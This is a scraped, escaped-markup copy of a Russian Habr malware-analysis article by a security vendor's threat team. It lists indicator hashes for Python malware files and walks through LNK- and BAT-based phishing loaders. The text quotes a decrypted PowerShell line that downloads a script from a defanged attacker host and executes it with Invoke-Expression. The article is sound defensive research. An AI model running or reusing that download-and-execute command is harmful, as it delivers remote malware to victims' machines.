\u00a0<\/p>\n

14fff2e3ec317ba6174c73d8ff432e89<\/p>\n

226940eb6ae3e6069f7a93fe8d800437941d0c07<\/p>\n

c1969a287c8425d306dab962572667b26ad2135376d3dc24fdf6dba52d6ee62b<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-xw5.py<\/a><\/p>\n

\u00a0<\/p>\n

a149927719c37087abd9782a281bd0c4<\/p>\n

a8077647e030ec604d2576b36b6ddc3086ecf38b<\/p>\n

511565889577b25381558039feaf37ec36d98806fbc5d643dc8a51ee5aab37e6<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

FTSP.zip<\/a>-\\FTSP\\Print\\Python312<\/p>\n

\u00a0<\/p>\n

fv1.py<\/p>\n

\u00a0<\/p>\n

2937c54a89355dd0e1c5ee87145635ae<\/p>\n

63605c2c5484ccfd359af5da9714508698e9efe3<\/p>\n

c20a2d5c4bd09c1858ac88c8900609c9306e59e412d1d3b37be5c5971d9561f4<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

fv2.py<\/p>\n

\u00a0<\/p>\n

2e4249736ffe4977ef0e667675dfa0b7<\/p>\n

f530e1fd18a0f31eddf70c5491e3b03235416b30<\/p>\n

382dbe6d39c39fd38e1ee247592deaab1d55a4525f062cb9372de08cb842330e<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

fv3.py<\/p>\n

\u00a0<\/p>\n

566bbee17a5af649e465b7dfba1f2de0<\/p>\n

d3939d3eed0341cf0b8eb256142487690300aaec<\/p>\n

7184b9380355584e2c2279cd3bf50ba651b26848f390e723dc33f80ef865f9d2<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

fv4.py<\/p>\n

\u00a0<\/p>\n

09ced038c86243c2fdcf7478e41e69db<\/p>\n

d44e59b64d443b82e5123af9f7a46c6866503c31<\/p>\n

8877e607552950a006062ee083437e733de5f502c0979b8de20962327d426395<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

fv5.py<\/p>\n

\u00a0<\/p>\n

8113a620761a6da49ce678f56f48ce8e<\/p>\n

671b7940be5f857e1f517bf784a672feba221de9<\/p>\n

5645e16631e12be7eb36aeba6fe76cdff82b8be163a44a442188d90fb44cec34<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

fv6.py<\/p>\n

\u00a0<\/p>\n

fe7d106dca7cfd92e8e375103703cfff<\/p>\n

01450c1567a96dde91c50638c0fc42ca71f25777<\/p>\n

2997b820a4834add998b16e373eb7c63a4b72eb508a09c57b0f04a2557438c94<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam1.py<\/p>\n

\u00a0<\/p>\n

e9dc79e096ccd79ea1daf0203eeec102<\/p>\n

cf8f946d49f5e3db3b7535d3c3e1b25a0de238e0<\/p>\n

64ebc4b51139cc65b4140f8600b7d3e5f40c7d6b3fb754c29b6d5801c6605e2f<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam2.py<\/p>\n

\u00a0<\/p>\n

d20a1dcef8d4e48bfaa90abd0d5516bd<\/p>\n

7140f0c13191c10b93cd8cb15b667c40cccfb842<\/p>\n

2fc47aceb8eeb0ac4d47d5b2002275d961a0a39fe77069500de2ab8c0ba03a44<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam3.py<\/p>\n

\u00a0<\/p>\n

935814f39b1b39fe0fe9186e560321dd<\/p>\n

b27ab2cafe49b438cdca41dbfe85306729ba0a32<\/p>\n

8fbb326abcc859280a33343cbd3ffc3dcc5366123da25d99868e950100a21fec<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam4.py<\/p>\n

\u00a0<\/p>\n

abe3d57fde219f4fb7e59c9a0c8a260f<\/p>\n

992a557755273e7966198a32bfcaa03c4258a183<\/p>\n

59d1768012f0449539cb7fec717d8ff39906009c288bf4db6a0bee19c13d8754<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam5.py<\/p>\n

\u00a0<\/p>\n

2a87efce9af96a06278423d7d1e32685<\/p>\n

09b5de02a26f602806a09f7f4fcd858c99acc588<\/p>\n

64b72524187da048c17958c5915d746a6ea3d283b8d6c91d60353c12109968fe<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

yam6.py<\/p>\n

\u00a0<\/p>\n

0628e001040172046528325e189b43e2<\/p>\n

09c5482a10b9c35e94356e4333cd2342aa94c3f0<\/p>\n

8ea818f50a520660e3a62fcbba9e3df82635bf1b2d9530c24fa6624187ba628c<\/p>\n<\/div>\n<\/div>\n<\/div>\n

<\/div>\n


\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 https:\/\/habr.com\/ru\/articles\/923818\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

<\/div>\n
\n
\n
\n
\n
<\/figure>\n

\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u041d\u0430 \u0441\u0432\u044f\u0437\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u00a0UserGate uFactor<\/strong> \u0438 \u044f \u2014 \u0435\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0421\u0442\u0435\u043f\u0430\u043d \u041f\u0430\u043d\u0444\u0438\u043b\u043e\u0432<\/strong>. <\/p>\n

\u041c\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0446\u0435\u043b\u0443\u044e \u0441\u0435\u0440\u0438\u044e \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. <\/p>\n

\u0414\u0430, \u043c\u044b \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c NGFW, \u043d\u043e \u0438, \u043a\u0430\u043a \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0433\u0440\u043e\u0437\u044b. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0432\u0430 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0433\u043e. \u041f\u0435\u0440\u0432\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u2014 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 LNK-\u0444\u0430\u0439\u043b\u043e\u0432, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u0442\u043e\u0440\u043e\u0439 \u2014 \u0430\u0442\u0430\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 BAT-\u0444\u0430\u0439\u043b\u044b. <\/p>\n

\u041e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0432 \u043e\u0431\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430. \u0424\u0430\u0439\u043b\u044b, \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043a \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u0430\u043c, \u043e\u0431\u044b\u0447\u043d\u043e \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u044b \u0432 ZIP-\u0430\u0440\u0445\u0438\u0432. \u0418\u043d\u043e\u0433\u0434\u0430 \u0430\u0440\u0445\u0438\u0432\u044b \u0437\u0430\u0449\u0438\u0449\u0430\u044e\u0442 \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0421\u0417\u0418, \u0441\u0430\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f. <\/p>\n

\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 1: \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0432 LNK-\u0444\u0430\u0439\u043b\u0435<\/strong><\/p>\n

\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u0437\u0432\u0435\u043d\u0430 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044f \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u044b \u0444\u0430\u0439\u043b\u044b MS-SHLLINK. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0432 LNK-\u0444\u0430\u0439\u043b\u0430\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u044b CMD \u0438\u043b\u0438 PowerShell, \u043d\u043e \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b. \u041a \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u0437\u0430\u0447\u0430\u0441\u0442\u0443\u044e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0438\u043b\u0438 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u0435\u0442 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0433\u0440\u043e\u0437\u044b \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.<\/p>\n

\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u0430 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.<\/p>\n

\u0414\u043b\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u043e\u0432 \u043c\u043e\u0436\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f hex-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u043c, \u0443\u0442\u0438\u043b\u0438\u0442\u0430\u043c\u0438 xxd \u0438\u043b\u0438 cat \u0432 UNIX-\u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0421\u0442\u043e\u0438\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 hex-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0442\u044c \u043d\u0435 \u0441\u0430\u043c LNK-\u0444\u0430\u0439\u043b, \u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0441\u044b\u043b\u0430\u0435\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a, \u2014 \u0431\u0443\u0434\u044c\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u044b.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 LNK-\u0444\u0430\u0439\u043b\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439<\/em><\/figcaption><\/div>\n<\/figure>\n
\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. \u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 LNK-\u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b cat<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043c \u0435\u0433\u043e \u0432 \u0431\u043e\u043b\u0435\u0435 \u0443\u0434\u043e\u0431\u043d\u044b\u0439 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0432\u0438\u0434.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439, \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u043d\u044b\u0439 \u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u0430<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 3 \u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0434\u0432\u0430 \u0441\u0442\u0440\u043e\u043a\u043e\u0432\u044b\u0445 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 \u00aba\u00bb \u0438 \u00abb\u00bb, \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 base64. \u0410\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u00aba\u00bb \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c, \u0430 \u00abb\u00bb \u2014 \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u044a\u0435\u043a\u0442 System.Security<\/a>.Cryptography.AesManaged, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u0443\u044e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0441\u0438\u043c\u043c\u0435\u0442\u0440\u0438\u0447\u043d\u043e\u0433\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f AES. \u0410\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b \u00aba\u00bb \u0438 \u00abb\u00bb \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u00ab$a\u00bb \u0438 \u00ab$b\u00bb \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.<\/p>\n

\u0414\u043b\u044f \u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f PowerShell. \u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 Invoke-Expression $h \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043b\u0441\u044f.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0420\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0430 \u0441\u0442\u0440\u043e\u043a\u0438 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 \u00aba\u00bb<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 4 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: $script = Invoke-WebRequest -Uri ‘https:\/\/emptyservices[.]xyz\/public\/904e5c82a258472395094ca10082fdfb.txt<\/a>‘ -UseBasicParsing; Invoke-Expression $script.Content \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 904e5c82a258472395094ca10082fdfb.txt \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0430\u0439\u043b.<\/p>\n

\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 PowerShell, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 Invoke-Expression $script.Content \u043d\u0430 echo $script.Content, \u0438\u043b\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0443 curl \u0438\u043b\u0438 \u0441\u043a\u0430\u0447\u0430\u0432 \u0447\u0435\u0440\u0435\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440. \u041d\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0431\u044b\u043b\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430.<\/p>\n

\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $KEYIV (\u0441\u043c. \u0440\u0438\u0441. 3), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0432 \u0444\u0430\u0439\u043b\u0435 904e5c82a258472395094ca10082fdfb.txt.<\/p>\n

\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 2: BAT-\u0444\u0430\u0439\u043b \u0438 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f Kramer \u0432 Python Malware<\/strong><\/p>\n

\u0422\u0435\u043f\u0435\u0440\u044c \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439.<\/p>\n

\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 BAT-\u0444\u0430\u0439\u043b. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u043a \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u0432 BAT-\u0444\u0430\u0439\u043b\u0435 \u0441\u043b\u043e\u0436\u043d\u0443\u044e \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044e, \u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u043d\u044f\u044e\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 \u0442\u0435\u043a\u0441\u0442\u0430. \u041f\u0440\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Notepad, \u0443\u0432\u0438\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u043c CyberChef<\/a> \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u043c Text_Encoding_Brute_Force. <\/p>\n

\n
